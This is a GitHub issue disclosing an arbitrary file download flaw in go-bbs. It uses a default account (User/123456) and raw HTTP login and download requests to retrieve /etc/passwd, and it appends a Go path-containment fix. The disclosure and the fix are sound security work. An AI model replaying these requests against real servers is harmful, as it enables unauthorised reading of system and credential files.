go-bbs has an arbitrary file download vulnerability #10

Open
yuyan-sec opened this issue Feb 26, 2023 · 0 comments

Install

  1. Download: git clone https://github.com/gobbscom/go-bbs.git
  2. Create a directory: cd go-bbs && mkdir conf
  3. Copy the configuration file: cp app.conf.example conf/app.conf
  4. Modify the database configuration
  5. Execute ./go-bbs --install to install the database
  6. Finally, execute ./go-bbs to access the corresponding port

Vulnerability Description AND recurrence

View the routing API in routers/router.go, line 196.

Follow up the &home.SingleController{} Download method. This interface requires a login, and a global search for Customer shows that a user is added by default:

UserName: User
PassWord: 123456

Check out router.go, follow up &home.LoginController{}, and pass the username and password to log in:

POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=user&password=123456

Credentials obtained: beegosessionID=***

The incoming URL needs to be AesDecrypt
So you need to perform AesEncrypt on the downloaded path

GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close


Use the credentials to access the downloaded API and successfully download /etc/passwd
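
The report above ends with a decrypted path of /etc/passwd being served by the download endpoint. The following is an added example, not go-bbs code, of a containment check that a download handler can apply to the decrypted value before opening anything; `ResolveDownload`, `inside`, `ErrOutsideBase` and the idea of a single absolute download root are assumptions made for the illustration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// ErrOutsideBase: the request is not a regular file under the download root.
var ErrOutsideBase = errors.New("path is outside the download root")

// inside reports whether p is root itself or lies beneath it.
func inside(root, p string) bool {
	rel, err := filepath.Rel(root, p)
	return err == nil && rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// ResolveDownload (hypothetical helper) maps a decrypted, client-supplied path
// onto baseDir (assumed absolute) and rejects anything that leaves it.
func ResolveDownload(baseDir, decrypted string) (string, error) {
	root, err := filepath.EvalSymlinks(baseDir)
	if err != nil {
		return "", err
	}
	if decrypted == "" || filepath.IsAbs(decrypted) {
		return "", ErrOutsideBase // absolute paths such as /etc/passwd never qualify
	}
	candidate := filepath.Join(root, decrypted) // Join also collapses ".." segments
	if !inside(root, candidate) {
		return "", ErrOutsideBase // lexical escape via "../"
	}
	resolved, err := filepath.EvalSymlinks(candidate)
	if err != nil {
		return "", err // missing file or broken link
	}
	info, err := os.Stat(resolved)
	if err != nil || !inside(root, resolved) || !info.Mode().IsRegular() {
		return "", ErrOutsideBase // symlink pointing out of root, or not a plain file
	}
	return resolved, nil
}

func main() {
	_, err := ResolveDownload(os.TempDir(), "/etc/passwd") // constructed request value
	fmt.Println(err)                                       // rejected before any file is opened
}
```

Encrypting the path parameter does not substitute for this check: any client that can produce a valid ciphertext controls the plaintext path.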
